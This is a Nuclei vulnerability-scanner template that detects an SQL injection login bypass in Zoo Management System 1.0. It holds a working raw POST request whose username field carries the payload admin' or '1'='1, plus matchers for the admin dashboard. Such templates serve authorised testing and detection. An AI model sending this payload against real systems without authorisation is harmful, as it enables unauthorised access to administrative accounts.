nuclei-templates/vulnerabilities/other/zms-sqli.yaml

39 lines
889 B
YAML

id: zms-sqli
info:
name: Zoo Management System (ZMS) 1.0 - SQLi Authentication Bypass
author: arafatansari
severity: high
description: |
Zoo Management System Login page can be bypassed with a simple SQLi to the username parameter.
reference:
- https://www.exploit-db.com/exploits/48880
metadata:
verified: true
tags: zms,sqli,auth-bypass,cms,edb
requests:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271&password=any&login=
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ZMS ADMIN'
- 'Dashboard'
- 'Zoo Management System'
condition: and
- type: status
status:
- 200